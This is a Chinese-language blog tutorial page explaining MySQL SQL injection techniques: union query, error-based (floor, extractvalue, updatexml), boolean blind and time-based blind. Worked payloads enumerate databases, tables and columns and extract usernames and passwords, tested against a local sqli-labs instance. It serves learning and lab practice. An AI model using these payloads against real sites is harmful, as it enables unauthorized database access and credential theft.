<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-flash.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"yoursite.com","root":"/","scheme":"Gemini","version":"7.7.2","exturl":false,"sidebar":{"position":"left","width":230,"display":"post","padding":15,"offset":10,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":true,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="联合查询注入sql注入流程1：判断注入点，在可能存在SQL注入变量的后边添加以下payload:">
<meta property="og:type" content="article">
<meta property="og:title" content="sql注入">
<meta property="og:url" content="http://yoursite.com/2020/04/12/sql%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="W7">
<meta property="og:description" content="联合查询注入sql注入流程1：判断注入点，在可能存在SQL注入变量的后边添加以下payload:">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://yoursite.com/2020/04/12/sql%E6%B3%A8%E5%85%A5/3.png">
<meta property="og:image" content="http://yoursite.com/2020/04/12/sql%E6%B3%A8%E5%85%A5/4.png">
<meta property="og:image" content="http://yoursite.com/2020/04/12/sql%E6%B3%A8%E5%85%A5/un.png">
<meta property="og:image" content="http://yoursite.com/2020/04/12/sql%E6%B3%A8%E5%85%A5/union.png">
<meta property="og:image" content="http://yoursite.com/2020/04/12/sql%E6%B3%A8%E5%85%A5/mysql.png">
<meta property="article:published_time" content="2020-04-11T19:00:18.000Z">
<meta property="article:modified_time" content="2020-04-26T22:27:47.688Z">
<meta property="article:author" content="W7">
<meta property="article:tag" content="sql">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/2020/04/12/sql%E6%B3%A8%E5%85%A5/3.png">

<link rel="canonical" href="http://yoursite.com/2020/04/12/sql%E6%B3%A8%E5%85%A5/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>sql注入 | W7</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome/css/font-awesome.min.css">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">W7</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">欢迎光临本破站</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
        <li class="menu-item menu-item-links">

    <a href="/links/" rel="section"><i class="fa fa-fw fa-link"></i>链接</a>

  </li>
        <li class="menu-item menu-item-schedule">

    <a href="/schedule/" rel="section"><i class="fa fa-fw fa-calendar"></i>葵花宝典</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocorrect="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/04/12/sql%E6%B3%A8%E5%85%A5/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/head.jpg">
      <meta itemprop="name" content="W7">
      <meta itemprop="description" content="知识是一种乐趣，好奇是知识的萌芽">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="W7">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          sql注入
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-04-12 03:00:18" itemprop="dateCreated datePublished" datetime="2020-04-12T03:00:18+08:00">2020-04-12</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-04-27 06:27:47" itemprop="dateModified" datetime="2020-04-27T06:27:47+08:00">2020-04-27</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/web/" itemprop="url" rel="index"><span itemprop="name">web</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="联合查询注入"><a href="#联合查询注入" class="headerlink" title="联合查询注入"></a>联合查询注入</h2><h3 id="sql注入流程"><a href="#sql注入流程" class="headerlink" title="sql注入流程"></a>sql注入流程</h3><p>1：判断注入点，在可能存在SQL注入变量的后边添加以下payload:<a id="more"></a><br>➢<code>and 1=1</code> / <code>and 1=2</code>回显页面不同(整形判断)<br>➢单引号或双引号判断显示数据库错误信息或者页面回显不同(整形，字符串类型判断)<br>➢<code>\</code> (转义符)<br>➢<code>-1</code>/<code>+1</code>回显下一个或上一个页面(整型判断)<br>注:加号<code>&#39;+&#39;</code>在URL中有特殊含义，因此在需要对其进行URL编码为<code>%2b</code>。<br>2：判断是整型注入还是字符型注入<br>数字型与字符型的最大区别在于:数字类型不需要引号闭合,而字符类型需要使用引号闭合。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from table where id &#x3D; 1      #数字型</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from table where username &#x3D; &#39;admin&#39;	  #字符型</span><br></pre></td></tr></table></figure>
<p>3、根据不同的分类进行注入<br>根据SQL注入语法分类:<br>➢UNION query SQL injection (可联合查询注入)<br>➢Error-based SQL injection (报错型注入)<br>➢Boolean-based blind SQL injection (基于布尔型注入)<br>➢Time-based blind SQL injection (基于时间延迟注入)<br>➢Stacked queries SQL injection(可多语句查询注入)</p>
<h3 id="UNION使用规则"><a href="#UNION使用规则" class="headerlink" title="UNION使用规则"></a>UNION使用规则</h3><p>UNION的作用是将两个或多个SELECT语句查询结果合并起来。<br>➢UNION必须由两条或两条以上的SELECT语句组成,语句之间用关键字UNION分隔。<br>➢UNION中的每个查询的列数必须相同。<br>➢UNION会从查询结果集中自动去除了重复行。</p>
<h3 id="联合查询注入前提"><a href="#联合查询注入前提" class="headerlink" title="联合查询注入前提"></a>联合查询注入前提</h3><p>前提条件:页面上有显示位，在一个网站的正常页面,服务端执行SQL语句查询数据库中的数据,客户端将数据展示在页面中,这个展示数据的位置就叫显示位。</p>
<h3 id="UNION查询手注过程"><a href="#UNION查询手注过程" class="headerlink" title="UNION查询手注过程"></a>UNION查询手注过程</h3><h4 id="1、判断是整型还是字符型"><a href="#1、判断是整型还是字符型" class="headerlink" title="1、判断是整型还是字符型"></a>1、判断是整型还是字符型</h4><p>&emsp;&emsp;上面已经提到过就不说了</p>
<h4 id="2、判断查询列数"><a href="#2、判断查询列数" class="headerlink" title="2、判断查询列数"></a>2、判断查询列数</h4><p>order by函数是对MySQL中查询结果按照指定字段名进行排序,除了指定字段名还可以指定字段的栏位进行排序,第一个查询字段为1 ,第二个为2 ,依次类推。我们可以通过二分法来猜解列数。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">order by 1</span><br><span class="line">order by 20</span><br><span class="line">order by 10</span><br><span class="line">......</span><br></pre></td></tr></table></figure>
<p>这里的<code>order by 3</code>还是正常显示，4就开始报错。那就说明查询列数应该是3<br><img src="3.png" alt=""><br><img src="4.png" alt=""></p>
<h4 id="3、判断显示位"><a href="#3、判断显示位" class="headerlink" title="3、判断显示位"></a>3、判断显示位</h4><p><img src="un.png" alt=""><br>2，3<br><img src="union.png" alt=""></p>
<h4 id="4、获取所有数据库名"><a href="#4、获取所有数据库名" class="headerlink" title="4、获取所有数据库名"></a>4、获取所有数据库名</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">group_concat() 一次性显示:</span><br><span class="line">select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA;</span><br><span class="line">limit 逐一显示:</span><br><span class="line">select count(SCHEMA_NAME) from information_schema.SCHEMATA; 		#查询数据库个数</span><br><span class="line">select SCHEMA_NAME from information_schema.SCHEMATA limit 0,1;</span><br></pre></td></tr></table></figure>
<h4 id="5、获取数据库-test-所有表名"><a href="#5、获取数据库-test-所有表名" class="headerlink" title="5、获取数据库(test)所有表名"></a>5、获取数据库(test)所有表名</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">group_concat() 一次性显示:</span><br><span class="line">select group_concat(TABLE_NAME) from information_schema.TABLES where table_schema&#x3D;&#39;test&#39;;</span><br><span class="line">limit 逐一显示:</span><br><span class="line">select count(TABLE_NAME) from information_schema.TABLES where table_schema&#x3D;&#39;test&#39;;		#查询表的个数</span><br><span class="line">select TABLE_NAME from information_schema.SCHEMATA where table_schema&#x3D;&#39;test&#39; limit 0,1;</span><br></pre></td></tr></table></figure>
<p>两个显示位，就可以直接查数据库名和所有表名了<del><code>mysql</code>的所有表名,接下来查下去的东西也就直接放查询语句了</del><br><img src="mysql.png" alt=""></p>
<h4 id="6、获取-数据库-test-表-admin-中所有字段名"><a href="#6、获取-数据库-test-表-admin-中所有字段名" class="headerlink" title="6、获取(数据库:test,表:admin)中所有字段名"></a>6、获取(数据库:test,表:admin)中所有字段名</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">group_concat() 一次性显示:</span><br><span class="line">select group_concat(COLUMN_NAME) from information_schema.COLUMNS where table_schema&#x3D;&#39;test&#39; and table_name&#x3D;&#39;admin&#39;;</span><br><span class="line">limit 逐一显示:</span><br><span class="line">select count(COLUMN_NAME) from information_schema.COLUMNS where table_schema&#x3D;&#39;test&#39; and table_name&#x3D;&#39;admin&#39;;		#查询字段总个数</span><br><span class="line">select COLUMN_NAME from information_schema.COLUMNS where table_schema&#x3D;&#39;test&#39; and table_name&#x3D;&#39;admin&#39; limit 0,1;</span><br></pre></td></tr></table></figure>
<h4 id="7、获取字段中的数据"><a href="#7、获取字段中的数据" class="headerlink" title="7、获取字段中的数据"></a>7、获取字段中的数据</h4><p>列出(数据库: test表: admin)中指定字段(username,password)中的数据:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">group_concat() 一次性显示:</span><br><span class="line">select group_concat(concat_ws (&#39;0x20&#39;,username,password)) from test.admin;</span><br><span class="line">limit 逐一显示:</span><br><span class="line">select count(*) from test.admin; 	#查询总共有多少行数据</span><br><span class="line">select username,password from test.admin limit 0,1;</span><br></pre></td></tr></table></figure>

<h2 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h2><h3 id="前提"><a href="#前提" class="headerlink" title="前提"></a>前提</h3><p>页面上没有显示位，但有<code>sql</code>语句执行错误信息输出/脚本语言报错</p>
<p><del>在用<code>PHP</code>对<code>MySQL</code>进行一些增删改查操作的时候 ,如果数据库在执行的过程中遇到错误,此时数据库是有错误回显的, 但是这个错误回显不会显示在Web应用页面中的。</del></p>
<h3 id="注入过程"><a href="#注入过程" class="headerlink" title="注入过程"></a>注入过程</h3><p>和一般的注入流程也是一样的，只是查询的时候稍微不一样</p>
<h3 id="函数总结"><a href="#函数总结" class="headerlink" title="函数总结"></a>函数总结</h3><h4 id="floor报错"><a href="#floor报错" class="headerlink" title="floor报错"></a>floor报错</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a)</span><br></pre></td></tr></table></figure>

<h4 id="extractvalue"><a href="#extractvalue" class="headerlink" title="extractvalue()"></a>extractvalue()</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">and extractvalue(1, payload)</span><br><span class="line">and extractvalue(1, concat(0x7e,@@version,0x7e))</span><br></pre></td></tr></table></figure>

<h4 id="updatexml"><a href="#updatexml" class="headerlink" title="updatexml"></a>updatexml</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">and updatexml(1,payload,1)</span><br><span class="line">and updatexml(1, concat(0x7e,@@version,0x7e),1)</span><br></pre></td></tr></table></figure>

<h5 id="updatexml测的sqllab1"><a href="#updatexml测的sqllab1" class="headerlink" title="updatexml测的sqllab1"></a>updatexml测的sqllab1</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;localhost&#x2F;Less-1?id&#x3D;1&#39; and updatexml(1,user( ),1) --+</span><br></pre></td></tr></table></figure>
<p>user()显示不完全，可以改成下面这样多个字符串连接成一个字符串就可以显示更多东西了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;localhost&#x2F;Less-1?id&#x3D;1&#39; and updatexmL( 1, concat(0x7e,user( ) ,0x7e) ,1) --+</span><br></pre></td></tr></table></figure>
<p>查询所有数据库：受到输出长度限制</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;localhost&#x2F;Less-1?id&#x3D;1&#39; and updatexmL( 1, concat(0x7e,(select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA) ,0x7e) ,1) --+</span><br></pre></td></tr></table></figure>

<p>可以通过限制查询条件一条一条的查,<code>limit 0,1</code>从第一个值开始查询</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select SCHEMA_NAME from information_schema.schemata limit 0,1</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select count(SCHEMA_NAME) from information_schema.schemata   #</span><br></pre></td></tr></table></figure>

<h2 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h2><h3 id="前提-1"><a href="#前提-1" class="headerlink" title="前提"></a>前提</h3><p>页面中没有显示位，没有输出SQL语句执行错误信息。只能通过页面返回正常/不正常来判断存不存在注入。    缺点:速度太慢,耗费大量时间。</p>
<h3 id="常用函数"><a href="#常用函数" class="headerlink" title="常用函数"></a>常用函数</h3><h4 id="substr"><a href="#substr" class="headerlink" title="substr()"></a>substr()</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">substr (string, num start, num length)</span><br></pre></td></tr></table></figure>

<p>作用：截取字符串。(string:字符串  start:起始位置  length:长度)</p>
<h4 id="ascii"><a href="#ascii" class="headerlink" title="ascii()"></a>ascii()</h4><p>作用:返回字符串str的字符ASCII码值。<br>如果str是空字符串就返回0.如果string是NULL就返回NULL。</p>
<h3 id="布尔盲注过程"><a href="#布尔盲注过程" class="headerlink" title="布尔盲注过程"></a>布尔盲注过程</h3><h4 id="判断数据库个数"><a href="#判断数据库个数" class="headerlink" title="判断数据库个数"></a>判断数据库个数</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id&#x3D;1 and (select count(schema_name) from information_schema.schemata)&gt;8</span><br></pre></td></tr></table></figure>
<h4 id="判断第一个数据库名的字符长度"><a href="#判断第一个数据库名的字符长度" class="headerlink" title="判断第一个数据库名的字符长度"></a>判断第一个数据库名的字符长度</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id&#x3D;1 and (select length(schema_name) from information_schema.schemata limit 0,1)&gt;18</span><br></pre></td></tr></table></figure>
<h4 id="判断第一个库的第一个字符"><a href="#判断第一个库的第一个字符" class="headerlink" title="判断第一个库的第一个字符"></a>判断第一个库的第一个字符</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id&#x3D;1 and (select ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1)))&gt;105</span><br></pre></td></tr></table></figure>
<h4 id="判断第一个库的第二个字符"><a href="#判断第一个库的第二个字符" class="headerlink" title="判断第一个库的第二个字符"></a>判断第一个库的第二个字符</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id&#x3D;1 and (select ascii(substr((select schema_name from information_schema.schemata limit 0,1),2,1)))&gt;110</span><br></pre></td></tr></table></figure>
<h4 id="依次找出剩下内容···"><a href="#依次找出剩下内容···" class="headerlink" title="依次找出剩下内容···"></a>依次找出剩下内容···</h4><p>用到<code>ascii()</code>就是借此利用二分法减少盲注次数</p>
<h2 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h2><h3 id="前提-2"><a href="#前提-2" class="headerlink" title="前提"></a>前提</h3><p>页面上没有显示位,也没有输出SQL语句执行错误信息。正确的SQL语句和错误的SQL语句返回页面都一样,但是加入<code>sleep(5)</code>条件之后,页面的返回速度明显慢了5秒。</p>
<h3 id="if-函数"><a href="#if-函数" class="headerlink" title="if()函数"></a>if()函数</h3><pre><code>IF(Condition,A,B)
当Condition为TRUE时,返回A。
当Condition为False时,返回B。</code></pre><h3 id="注入过程-1"><a href="#注入过程-1" class="headerlink" title="注入过程"></a>注入过程</h3><p>判断数据库个数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id&#x3D;1 and if((select count(schema_name) from information_schema.schemata)&#x3D;9,sleep(5),1)</span><br></pre></td></tr></table></figure>
<p>判断第一个数据库名有多少个字符</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id&#x3D;1 and if((select length(schema_name) from information_schema.schemata limit 0,1)&#x3D;18,S leep(5),1)</span><br></pre></td></tr></table></figure>
<p>判断第一个库第一个字符</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id&#x3D;1 and if((select ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1)))&#x3D;105,sleep(5),1)&#x2F;&#x2F;</span><br></pre></td></tr></table></figure>
<p>判断第一个库第二个字符</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id&#x3D;1 and if((select ascii(substr((select schema_name from information_schema.schemata limit 0,1),2,1)))&#x3D;110,sleep(5),1)&#x2F;&#x2F;</span><br></pre></td></tr></table></figure>

    </div>

    
    
    

    <div>
      
        <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">============本文结束( ´◔ ‸◔`)感谢您的阅读============</div>
    
</div>
      
    </div>
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>W7
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://yoursite.com/2020/04/12/sql%E6%B3%A8%E5%85%A5/" title="sql注入">http://yoursite.com/2020/04/12/sql注入/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fa fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/sql/" rel="tag"># sql</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/04/12/sql%E5%8E%9F%E7%90%86/" rel="prev" title="sql基础">
      <i class="fa fa-chevron-left"></i> sql基础
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/04/13/sql-labs/" rel="next" title="sql-labs">
      sql-labs <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>
  <aside class="sidebar">
    <div class="sidebar-inner">
      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#联合查询注入"><span class="nav-number">1.</span> <span class="nav-text">联合查询注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#sql注入流程"><span class="nav-number">1.1.</span> <span class="nav-text">sql注入流程</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#UNION使用规则"><span class="nav-number">1.2.</span> <span class="nav-text">UNION使用规则</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#联合查询注入前提"><span class="nav-number">1.3.</span> <span class="nav-text">联合查询注入前提</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#UNION查询手注过程"><span class="nav-number">1.4.</span> <span class="nav-text">UNION查询手注过程</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1、判断是整型还是字符型"><span class="nav-number">1.4.1.</span> <span class="nav-text">1、判断是整型还是字符型</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2、判断查询列数"><span class="nav-number">1.4.2.</span> <span class="nav-text">2、判断查询列数</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3、判断显示位"><span class="nav-number">1.4.3.</span> <span class="nav-text">3、判断显示位</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#4、获取所有数据库名"><span class="nav-number">1.4.4.</span> <span class="nav-text">4、获取所有数据库名</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#5、获取数据库-test-所有表名"><span class="nav-number">1.4.5.</span> <span class="nav-text">5、获取数据库(test)所有表名</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#6、获取-数据库-test-表-admin-中所有字段名"><span class="nav-number">1.4.6.</span> <span class="nav-text">6、获取(数据库:test,表:admin)中所有字段名</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#7、获取字段中的数据"><span class="nav-number">1.4.7.</span> <span class="nav-text">7、获取字段中的数据</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#报错注入"><span class="nav-number">2.</span> <span class="nav-text">报错注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#前提"><span class="nav-number">2.1.</span> <span class="nav-text">前提</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#注入过程"><span class="nav-number">2.2.</span> <span class="nav-text">注入过程</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#函数总结"><span class="nav-number">2.3.</span> <span class="nav-text">函数总结</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#floor报错"><span class="nav-number">2.3.1.</span> <span class="nav-text">floor报错</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#extractvalue"><span class="nav-number">2.3.2.</span> <span class="nav-text">extractvalue()</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#updatexml"><span class="nav-number">2.3.3.</span> <span class="nav-text">updatexml</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#updatexml测的sqllab1"><span class="nav-number">2.3.3.1.</span> <span class="nav-text">updatexml测的sqllab1</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#布尔盲注"><span class="nav-number">3.</span> <span class="nav-text">布尔盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#前提-1"><span class="nav-number">3.1.</span> <span class="nav-text">前提</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#常用函数"><span class="nav-number">3.2.</span> <span class="nav-text">常用函数</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#substr"><span class="nav-number">3.2.1.</span> <span class="nav-text">substr()</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#ascii"><span class="nav-number">3.2.2.</span> <span class="nav-text">ascii()</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#布尔盲注过程"><span 